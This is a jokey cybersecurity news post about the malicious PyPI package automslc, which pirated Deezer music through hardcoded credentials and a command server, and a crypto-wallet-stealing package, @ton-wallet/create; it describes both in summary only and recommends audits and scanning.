Okay, deep breath, let's get this over with. In the grand act of digital self-sabotage, we've littered this site with cookies. Yep, we did that. Why? So your highness can have a 'premium' experience or whatever. These traitorous cookies hide in your browser, eagerly waiting to welcome you back like a guilty dog that's just chewed your favorite shoe. And, if that's not enough, they also tattle on which parts of our sad little corner of the web you obsess over. Feels dirty, doesn't it?
Malicious Python Package Hits a Sour Note: 104K Downloads and a Symphony of Cybersecurity Risks
Cybersecurity alarm bells ring as automslc, a malicious Python library, downloads music from Deezer unauthorizedly. With over 104,000 downloads, it sneaks past Deezer’s restrictions using hardcoded credentials and a command-and-control server. Users unwittingly join a music piracy party, risking legal troubles. Beware of PyPI’s music piracy trap!
Hot Take:
Looks like the PyPI repository is trying to become the Spotify of piracy! With this new discovery, our hacker friends have found yet another way to make sure that your playlists can be downloaded faster than you can say “DMCA takedown notice.” Meanwhile, the @ton-wallet/create package is living proof that even in the world of crypto, you should never trust a package that arrives with a mnemonic phrase and a wink. Here’s hoping you don’t end up making a song and dance about your missing digital assets!
Key Points:
- Malicious Python library automslc found on PyPI, facilitating unauthorized music downloads from Deezer.
- automslc uses hardcoded credentials and communicates with an external C2 server, bypassing Deezer’s API restrictions.
- The package has been downloaded over 104,000 times since May 2019.
- Another rogue package, @ton-wallet/create, was found stealing cryptocurrency wallet phrases.
- Regular audits and scanning tools recommended to prevent supply chain security risks.
Already a member? Log in here